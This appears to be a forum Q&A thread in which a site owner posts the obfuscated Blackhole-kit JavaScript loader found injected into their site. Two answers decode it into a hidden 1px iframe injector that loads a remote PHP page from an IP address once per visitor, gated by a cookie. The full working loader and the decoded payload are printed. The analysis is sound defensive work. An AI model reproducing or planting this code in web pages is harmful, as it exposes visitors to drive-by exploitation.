
Blackhole Exploit / Javascript

My site got infected by the well-known Blackhole exploit. After some days and some helper scripts, I guess I have fixed it now.

I'm wondering what this exploit does?

// Obfuscated loader as found injected into the site. It is a single statement run;
// the page renderer wrapped the long array literal across the lines below.
// What it does, in order:
//   asd       - helper whose only statement is `d.body++`; it is called inside a
//               try/catch further down and only whether it throws matters.
//   a         - a comma-separated string of numbers, split into an array.
//   ss        - the String constructor, obtained via eval("S"+"tr"+"ing"),
//               presumably to keep the text `String.fromCharCode` out of the
//               raw page source.
//   d         - the document object.
//   for loop  - decodes every entry: parseInt(..., 8) reads it as octal, then
//               -(7-3) subtracts 4, yielding a character code.
//   try/catch - zz ends up 0 only if asd() threw; otherwise `zz&=2` on the still
//               undefined zz throws and zz becomes 1. The final eval therefore runs
//               only when `d.body++` threw and window["document"] exists - looks
//               like an environment check meant to skip simple analysis sandboxes;
//               confirm against the browsers in question.
//   eval(...) - runs the decoded text. Its plain form is shown in the answers
//               below; searching page templates for the markers it contains (the
//               iframe URL, element id 'vechx', cookie 'visited_uq') is the
//               quickest way to find other injected copies.
asd=function(){d.body++}; a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,172,151,147,154,174,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,172,151,147,154,174,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,66,64,74,62,74,67,62,66,71,62,66,72,63,151,167,150,62,164,154,164,53,77,21,16,44,172,151,147,154,174,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,172,151,147,154,174,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,172,151,147,154,174,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,172,151,147,154,174,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,172,151,147,154,174,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,172,151,147,154,174,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,172,151,147,154,174,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,172,151,147,154,174,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,172,151,147,154,174,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,172,151,147,154,174,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,
151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,
77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](",")); ss=eval("S"+"tr"+"ing"); d=document; for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a));

Does anybody have experience with this one?

Cheers!

lufi Avatar asked Mar 23 '23 19:03



2 Answers

It's an array of character codes (each parsed as octal and shifted by 4 in the loop), which `ss.fromCharCode.apply(ss,a)` converts to the following JS code:

// Injects a hidden 1px iframe that loads the attacker-controlled page into the
// visitor's browser. The iframe and its container div both use the id 'vechx'.
// The URL, the element id and the cookie name 'visited_uq' (used by the gate
// below) are the indicators worth searching for in page templates, database
// content and proxy/web-server logs.
function zzzfff() {
    var vechx = document.createElement('iframe');

    // Remote page pulled into the victim's browser.
    vechx.src = 'http://208.83.25.26/esd.php';
    // Styled so the frame is effectively invisible: absolutely positioned,
    // no border, 1x1 px, 1px from the top-left corner.
    vechx.style.position = 'absolute';
    vechx.style.border = '0';
    vechx.style.height = '1px';
    vechx.style.width = '1px';
    vechx.style.left = '1px';
    vechx.style.top = '1px';

    // Inject only once per page: document.write() a container div, then
    // append the iframe into it.
    if (!document.getElementById('vechx')) {
        document.write('<div id=\'vechx\'></div>');
        document.getElementById('vechx').appendChild(vechx);
    }
}

// Writes the cookie `cookieName=cookieValue` expiring nDays days from now
// (nDays defaults to 1 when it is null/undefined or 0) with an optional path.
// Generic helper using the legacy escape()/toGMTString() APIs; nothing
// malicious on its own - it only serves the "once per visitor" gate below.
function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    // 3600000 ms * 24 = one day; nDays is coerced to a number here.
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

// Reads the cookie `name` from document.cookie and returns its unescaped value,
// or null when it is not present. Generic helper; note that indexOf(name + "=")
// is a substring match, so a longer cookie name ending in `name` would match too.
function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    // Position of the first value character (just past `name=`).
    var len = start + name.length + 1;
    // When start is 0 the cookie string begins with `name=`, so the substring
    // comparison can never fail; this branch is effectively dead code.
    if ((!start) &&
        (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    // Value runs up to the next ';' or to the end of the cookie string.
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}
// Gate: fire the injector at most once per visitor per day. If the marker
// cookie 'visited_uq' already holds 55 nothing happens; otherwise the cookie
// is set for one day ('1') on path '/' and the iframe is injected. The marker
// cookie is a handy indicator when triaging which browsers/sessions were hit.
if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');

        zzzfff();
    }
}

Then that code is run with eval. As far as I can see, it loads http://208.83.25.26/esd.php in a hidden 1px iframe and sets a cookie so that this happens only once per visitor.

bfavaretto Avatar answered Apr 05 '23 22:04



The procedure for these eval-based ones is almost always the same: prettify the code, find and replace the critical eval with a console.log, and just run it (in an isolated environment, not in a browser session that holds anything you care about):

// Output of the console.log step: the iframe injector. It creates an iframe
// pointing at the attacker's page, hides it (1x1 px, no border, absolutely
// positioned) and appends it to a div with id 'vechx' that it writes into the
// page. Search your templates and stored content for the URL and the id.
function zzzfff() {
    var vechx = document.createElement('iframe');
    vechx.src = 'http://208.83.25.26/esd.php';
    vechx.style.position = 'absolute';
    vechx.style.border = '0';
    vechx.style.height = '1px';
    vechx.style.width = '1px';
    vechx.style.left = '1px';
    vechx.style.top = '1px';
    if (!document.getElementById('vechx')) {
        // The string argument shows up empty here because the page renderer
        // swallowed the HTML markup inside it; the decoded version in the
        // other answer shows the intended literal `'<div id=\'vechx\'></div>'`.
        document.write('
');
        document.getElementById('vechx').appendChild(vechx);
    }
}
// Sets `cookieName=cookieValue`, expiring nDays days from now (1 when nDays is
// null/undefined or 0), optionally scoped to `path`. Plain boilerplate built on
// the legacy escape()/toGMTString() functions.
function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    // One day is 3600000 ms * 24.
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
// Returns the unescaped value of cookie `name`, or null if it is not set.
// Standard cookie-reading snippet; the lookup is a substring match on
// `name=`, not an exact-name match.
function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    // With start == 0 the cookie string necessarily begins with `name=`, so
    // this guard cannot trigger; it is effectively dead code.
    if ((!start) && (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}
// Entry point of the decoded payload: if the marker cookie 'visited_uq' is
// not already 55, set it for one day on path '/' and inject the iframe.
// So each visitor is sent to the remote page once per day - the cookie name
// is a useful indicator when checking which clients were exposed.
if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');
        zzzfff();
    }
}

Instead of executing the code, it will print it out. This looks like some sort of tracking code installed on some person's exploited website.

Blender Avatar answered Apr 06 '23 00:04
